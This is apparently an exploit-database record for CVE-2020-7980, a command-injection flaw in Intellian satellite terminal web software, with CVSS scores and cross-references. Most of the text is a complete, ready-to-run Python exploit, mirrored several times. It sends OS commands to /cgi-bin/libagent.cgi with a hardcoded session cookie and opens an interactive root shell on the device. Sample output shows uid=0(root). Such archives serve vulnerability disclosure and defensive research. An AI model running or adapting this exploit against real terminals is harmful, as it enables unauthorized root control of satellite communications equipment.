ID EXPLOITPACK:5B29EB379B75C85DE0A4994A468D5D76
Type exploitpack
Reporter Xh4H
Modified 2020-01-29T00:00:00
Description
Satellian 1.12 - Remote Code Execution
# Exploit Title: Satellian 1.12 - Remote Code Execution
# Date: 2020-01-28
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980
# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||
# Performing initial scan. Listing available system binaries.
# Starting request to http://<redacted>
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...
# Satellian $ id
# uid=0(root) gid=0(root)
import requests
import argparse
import sys
import calendar
import time
from termcolor import colored
def cprint(text, color): # colored print
sys.stdout.write(colored(text + "\n", color, attrs=["bold"]))
def httpize(url):
if not url.startswith("http"):
cprint("Missing protocol, using http . . .", "yellow")
url = "http://" + url
return url
def send_command(url, command, verbose):
RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}}
string_to_split = '''"SUCCESS_"
},'''
if verbose:
cprint("Starting request to %s" % url, "yellow")
cprint("Executing command %s" % command, "yellow")
a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})
command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')
if len(command_output) < 4 and verbose:
cprint("Target doesn't seem to be vulnerable\nExiting.", 'red')
sys.exit()
print command_output
cprint("""
________________________________________
(__) / \\
(oo) ( Intellian Satellite Terminal PoC )
/-------\\/ --' \\________________________________________/
/ | ||
* ||----||
""", "green")
parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980")
parser.add_argument("-u", "--url", help="Base url")
args = parser.parse_args()
if args.url is None:
cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red")
sys.exit()
url = httpize(args.url)
def main():
cprint("Performing initial scan. Listing available system binaries.", "green")
send_command(url, '/bin/ls /bin', True)
while True:
command = raw_input('Satellian $ ')
send_command(url, command, False)
if __name__ == '__main__':
try:
main()
except Exception as e:
print e
print "\nAn error happened."
{"lastseen": "2020-04-01T20:40:39", "references": [], "description": "\nSatellian 1.12 - Remote Code Execution", "edition": 2, "reporter": "Xh4H", "exploitpack": {"type": "webapps", "platform": "hardware"}, "published": "2020-01-29T00:00:00", "title": "Satellian 1.12 - Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0143"]}, {"type": "cve", "idList": ["CVE-2020-7980"]}, {"type": "exploitdb", "idList": ["EDB-ID:47976"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156143"]}, {"type": "zdt", "idList": ["1337DAY-ID-33876"]}], "rev": 4}, "score": {"value": 6.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0143"]}, {"type": "cve", "idList": ["CVE-2020-7980"]}, {"type": "exploitdb", "idList": ["EDB-ID:47976"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156143"]}, {"type": "zdt", "idList": ["1337DAY-ID-33876"]}]}, "exploitation": null, "vulnersScore": 6.6}, "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7980"], "modified": "2020-01-29T00:00:00", "id": "EXPLOITPACK:5B29EB379B75C85DE0A4994A468D5D76", "href": "", "viewCount": 6, "sourceData": "# Exploit Title: Satellian 1.12 - Remote Code Execution\n# Date: 2020-01-28\n# Exploit Author: Xh4H\n# Vendor Homepage: https://www.intelliantech.com/?lang=en\n# Version: v1.12+\n# Tested on: Kali linux, MacOS\n# CVE : CVE-2020-7980\n\n# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980\n\n# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>\n# ________________________________________\n# (__) / \\\n# (oo) ( Intellian Satellite Terminal PoC )\n# /-------\\/ --' \\________________________________________/ \n# / | ||\n# * ||----|| \n\n# Performing initial scan. Listing available system binaries.\n# Starting request to http://<redacted>\n# Executing command /bin/ls /bin\n# acu_server\n# acu_tool\n# addgroup\n# adduser\n# ...\n\n# Satellian $ id\n# uid=0(root) gid=0(root)\n\nimport requests\nimport argparse\nimport sys\nimport calendar\nimport time\nfrom termcolor import colored\n\ndef cprint(text, color): # colored print\n\tsys.stdout.write(colored(text + \"\\n\", color, attrs=[\"bold\"]))\n\ndef httpize(url):\n\tif not url.startswith(\"http\"):\n\t\tcprint(\"Missing protocol, using http . . .\", \"yellow\")\n\t\turl = \"http://\" + url\n\treturn url\n\ndef send_command(url, command, verbose):\n\tRCE = {\"O_\":\"A\",\"V_\":1,\"S_\":123456789,\"F_\":\"EXEC_CMD\",\"P1_\":{\"F\":\"EXEC_CMD\",\"Q\":command}}\n\tstring_to_split = '''\"SUCCESS_\"\n},'''\n\n\tif verbose:\n\t\tcprint(\"Starting request to %s\" % url, \"yellow\")\n\t\tcprint(\"Executing command %s\" % command, \"yellow\")\n\n\ta = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})\n\tcommand_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')\n\n\tif len(command_output) < 4 and verbose:\n\t\tcprint(\"Target doesn't seem to be vulnerable\\nExiting.\", 'red')\n\t\tsys.exit()\n\tprint command_output\n\ncprint(\"\"\"\n ________________________________________\n (__) / \\\\\n (oo) ( Intellian Satellite Terminal PoC )\n /-------\\\\/ --' \\\\________________________________________/ \n / | ||\n* ||----|| \n\"\"\", \"green\")\n\nparser = argparse.ArgumentParser(description=\"Satellian: A PoC script for CVE-2020-7980\")\nparser.add_argument(\"-u\", \"--url\", help=\"Base url\")\nargs = parser.parse_args()\n\nif args.url is None:\n\tcprint(\"Missing arguments.\\nUsage example:\\n\" + sys.argv[0] + \" -u http://10.10.10.14\\n\", \"red\")\n\tsys.exit()\n\nurl = httpize(args.url)\n\ndef main():\n\tcprint(\"Performing initial scan. Listing available system binaries.\", \"green\")\n\tsend_command(url, '/bin/ls /bin', True)\n\n\twhile True:\n\t\tcommand = raw_input('Satellian $ ')\n\t\tsend_command(url, command, False)\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\texcept Exception as e:\n\t\tprint e\n\t\tprint \"\\nAn error happened.\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "scheme": null, "_state": {"dependencies": 1645776324}}
{"zdt": [{"lastseen": "2020-02-02T19:03:54", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2020-01-29T00:00:00", "type": "zdt", "title": "Satellian 1.12 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7980"], "modified": "2020-01-29T00:00:00", "id": "1337DAY-ID-33876", "href": "https://0day.today/exploit/description/33876", "sourceData": "# Exploit Title: Satellian 1.12 - Remote Code Execution\r\n# Exploit Author: Xh4H\r\n# Vendor Homepage: https://www.intelliantech.com/?lang=en\r\n# Version: v1.12+\r\n# Tested on: Kali linux, MacOS\r\n# CVE : CVE-2020-7980\r\n\r\n# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980\r\n\r\n# [email\u00a0protected] ~/Satellian> python satellian.py -u http://<redacted>\r\n# ________________________________________\r\n# (__) / \\\r\n# (oo) ( Intellian Satellite Terminal PoC )\r\n# /-------\\/ --' \\________________________________________/ \r\n# / | ||\r\n# * ||----|| \r\n\r\n# Performing initial scan. Listing available system binaries.\r\n# Starting request to http://<redacted>\r\n# Executing command /bin/ls /bin\r\n# acu_server\r\n# acu_tool\r\n# addgroup\r\n# adduser\r\n# ...\r\n\r\n# Satellian $ id\r\n# uid=0(root) gid=0(root)\r\n\r\nimport requests\r\nimport argparse\r\nimport sys\r\nimport calendar\r\nimport time\r\nfrom termcolor import colored\r\n\r\ndef cprint(text, color): # colored print\r\n\tsys.stdout.write(colored(text + \"\\n\", color, attrs=[\"bold\"]))\r\n\r\ndef httpize(url):\r\n\tif not url.startswith(\"http\"):\r\n\t\tcprint(\"Missing protocol, using http . . .\", \"yellow\")\r\n\t\turl = \"http://\" + url\r\n\treturn url\r\n\r\ndef send_command(url, command, verbose):\r\n\tRCE = {\"O_\":\"A\",\"V_\":1,\"S_\":123456789,\"F_\":\"EXEC_CMD\",\"P1_\":{\"F\":\"EXEC_CMD\",\"Q\":command}}\r\n\tstring_to_split = '''\"SUCCESS_\"\r\n},'''\r\n\r\n\tif verbose:\r\n\t\tcprint(\"Starting request to %s\" % url, \"yellow\")\r\n\t\tcprint(\"Executing command %s\" % command, \"yellow\")\r\n\r\n\ta = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})\r\n\tcommand_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')\r\n\r\n\tif len(command_output) < 4 and verbose:\r\n\t\tcprint(\"Target doesn't seem to be vulnerable\\nExiting.\", 'red')\r\n\t\tsys.exit()\r\n\tprint command_output\r\n\r\ncprint(\"\"\"\r\n ________________________________________\r\n (__) / \\\\\r\n (oo) ( Intellian Satellite Terminal PoC )\r\n /-------\\\\/ --' \\\\________________________________________/ \r\n / | ||\r\n* ||----|| \r\n\"\"\", \"green\")\r\n\r\nparser = argparse.ArgumentParser(description=\"Satellian: A PoC script for CVE-2020-7980\")\r\nparser.add_argument(\"-u\", \"--url\", help=\"Base url\")\r\nargs = parser.parse_args()\r\n\r\nif args.url is None:\r\n\tcprint(\"Missing arguments.\\nUsage example:\\n\" + sys.argv[0] + \" -u http://10.10.10.14\\n\", \"red\")\r\n\tsys.exit()\r\n\r\nurl = httpize(args.url)\r\n\r\ndef main():\r\n\tcprint(\"Performing initial scan. Listing available system binaries.\", \"green\")\r\n\tsend_command(url, '/bin/ls /bin', True)\r\n\r\n\twhile True:\r\n\t\tcommand = raw_input('Satellian $ ')\r\n\t\tsend_command(url, command, False)\r\n\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\tmain()\r\n\texcept Exception as e:\r\n\t\tprint e\r\n\t\tprint \"\\nAn error happened.\"\n\n# 0day.today [2020-02-02] #", "sourceHref": "https://0day.today/exploit/33876", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:14", "description": "A remote code execution vulnerability exists in Intellian Aptus Web. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-19T00:00:00", "type": "checkpoint_advisories", "title": "Intellian Aptus Web Remote Code Execution (CVE-2020-7980)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7980"], "modified": "2020-03-19T00:00:00", "id": "CPAI-2020-0143", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-01-30T07:19:49", "description": "", "published": "2020-01-29T00:00:00", "type": "packetstorm", "title": "Satellian 1.12 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7980"], "modified": "2020-01-29T00:00:00", "id": "PACKETSTORM:156143", "href": "https://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Satellian 1.12 - Remote Code Execution \n# Date: 2020-01-28 \n# Exploit Author: Xh4H \n# Vendor Homepage: https://www.intelliantech.com/?lang=en \n# Version: v1.12+ \n# Tested on: Kali linux, MacOS \n# CVE : CVE-2020-7980 \n \n# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980 \n \n# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted> \n# ________________________________________ \n# (__) / \\ \n# (oo) ( Intellian Satellite Terminal PoC ) \n# /-------\\/ --' \\________________________________________/ \n# / | || \n# * ||----|| \n \n# Performing initial scan. Listing available system binaries. \n# Starting request to http://<redacted> \n# Executing command /bin/ls /bin \n# acu_server \n# acu_tool \n# addgroup \n# adduser \n# ... \n \n# Satellian $ id \n# uid=0(root) gid=0(root) \n \nimport requests \nimport argparse \nimport sys \nimport calendar \nimport time \nfrom termcolor import colored \n \ndef cprint(text, color): # colored print \nsys.stdout.write(colored(text + \"\\n\", color, attrs=[\"bold\"])) \n \ndef httpize(url): \nif not url.startswith(\"http\"): \ncprint(\"Missing protocol, using http . . .\", \"yellow\") \nurl = \"http://\" + url \nreturn url \n \ndef send_command(url, command, verbose): \nRCE = {\"O_\":\"A\",\"V_\":1,\"S_\":123456789,\"F_\":\"EXEC_CMD\",\"P1_\":{\"F\":\"EXEC_CMD\",\"Q\":command}} \nstring_to_split = '''\"SUCCESS_\" \n},''' \n \nif verbose: \ncprint(\"Starting request to %s\" % url, \"yellow\") \ncprint(\"Executing command %s\" % command, \"yellow\") \n \na = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'}) \ncommand_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '') \n \nif len(command_output) < 4 and verbose: \ncprint(\"Target doesn't seem to be vulnerable\\nExiting.\", 'red') \nsys.exit() \nprint command_output \n \ncprint(\"\"\" \n________________________________________ \n(__) / \\\\ \n(oo) ( Intellian Satellite Terminal PoC ) \n/-------\\\\/ --' \\\\________________________________________/ \n/ | || \n* ||----|| \n\"\"\", \"green\") \n \nparser = argparse.ArgumentParser(description=\"Satellian: A PoC script for CVE-2020-7980\") \nparser.add_argument(\"-u\", \"--url\", help=\"Base url\") \nargs = parser.parse_args() \n \nif args.url is None: \ncprint(\"Missing arguments.\\nUsage example:\\n\" + sys.argv[0] + \" -u http://10.10.10.14\\n\", \"red\") \nsys.exit() \n \nurl = httpize(args.url) \n \ndef main(): \ncprint(\"Performing initial scan. Listing available system binaries.\", \"green\") \nsend_command(url, '/bin/ls /bin', True) \n \nwhile True: \ncommand = raw_input('Satellian $ ') \nsend_command(url, command, False) \n \nif __name__ == '__main__': \ntry: \nmain() \nexcept Exception as e: \nprint e \nprint \"\\nAn error happened.\" \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156143/satellian112-exec.txt"}], "cve": [{"lastseen": "2022-03-23T18:56:27", "description": "Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-25T19:15:00", "type": "cve", "title": "CVE-2020-7980", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7980"], "modified": "2020-01-29T15:15:00", "cpe": ["cpe:/a:intelliantech:aptus_web:1.24"], "id": "CVE-2020-7980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7980", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-05-04T17:11:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-29T00:00:00", "type": "exploitdb", "title": "Satellian 1.12 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-7980", "CVE-2020-7980"], "modified": "2020-01-29T00:00:00", "id": "EDB-ID:47976", "href": "https://www.exploit-db.com/exploits/47976", "sourceData": "# Exploit Title: Satellian 1.12 - Remote Code Execution\r\n# Date: 2020-01-28\r\n# Exploit Author: Xh4H\r\n# Vendor Homepage: https://www.intelliantech.com/?lang=en\r\n# Version: v1.12+\r\n# Tested on: Kali linux, MacOS\r\n# CVE : CVE-2020-7980\r\n\r\n# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980\r\n\r\n# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>\r\n# ________________________________________\r\n# (__) / \\\r\n# (oo) ( Intellian Satellite Terminal PoC )\r\n# /-------\\/ --' \\________________________________________/ \r\n# / | ||\r\n# * ||----|| \r\n\r\n# Performing initial scan. Listing available system binaries.\r\n# Starting request to http://<redacted>\r\n# Executing command /bin/ls /bin\r\n# acu_server\r\n# acu_tool\r\n# addgroup\r\n# adduser\r\n# ...\r\n\r\n# Satellian $ id\r\n# uid=0(root) gid=0(root)\r\n\r\nimport requests\r\nimport argparse\r\nimport sys\r\nimport calendar\r\nimport time\r\nfrom termcolor import colored\r\n\r\ndef cprint(text, color): # colored print\r\n\tsys.stdout.write(colored(text + \"\\n\", color, attrs=[\"bold\"]))\r\n\r\ndef httpize(url):\r\n\tif not url.startswith(\"http\"):\r\n\t\tcprint(\"Missing protocol, using http . . .\", \"yellow\")\r\n\t\turl = \"http://\" + url\r\n\treturn url\r\n\r\ndef send_command(url, command, verbose):\r\n\tRCE = {\"O_\":\"A\",\"V_\":1,\"S_\":123456789,\"F_\":\"EXEC_CMD\",\"P1_\":{\"F\":\"EXEC_CMD\",\"Q\":command}}\r\n\tstring_to_split = '''\"SUCCESS_\"\r\n},'''\r\n\r\n\tif verbose:\r\n\t\tcprint(\"Starting request to %s\" % url, \"yellow\")\r\n\t\tcprint(\"Executing command %s\" % command, \"yellow\")\r\n\r\n\ta = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})\r\n\tcommand_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')\r\n\r\n\tif len(command_output) < 4 and verbose:\r\n\t\tcprint(\"Target doesn't seem to be vulnerable\\nExiting.\", 'red')\r\n\t\tsys.exit()\r\n\tprint command_output\r\n\r\ncprint(\"\"\"\r\n ________________________________________\r\n (__) / \\\\\r\n (oo) ( Intellian Satellite Terminal PoC )\r\n /-------\\\\/ --' \\\\________________________________________/ \r\n / | ||\r\n* ||----|| \r\n\"\"\", \"green\")\r\n\r\nparser = argparse.ArgumentParser(description=\"Satellian: A PoC script for CVE-2020-7980\")\r\nparser.add_argument(\"-u\", \"--url\", help=\"Base url\")\r\nargs = parser.parse_args()\r\n\r\nif args.url is None:\r\n\tcprint(\"Missing arguments.\\nUsage example:\\n\" + sys.argv[0] + \" -u http://10.10.10.14\\n\", \"red\")\r\n\tsys.exit()\r\n\r\nurl = httpize(args.url)\r\n\r\ndef main():\r\n\tcprint(\"Performing initial scan. Listing available system binaries.\", \"green\")\r\n\tsend_command(url, '/bin/ls /bin', True)\r\n\r\n\twhile True:\r\n\t\tcommand = raw_input('Satellian $ ')\r\n\t\tsend_command(url, command, False)\r\n\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\tmain()\r\n\texcept Exception as e:\r\n\t\tprint e\r\n\t\tprint \"\\nAn error happened.\"", "sourceHref": "https://www.exploit-db.com/download/47976", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
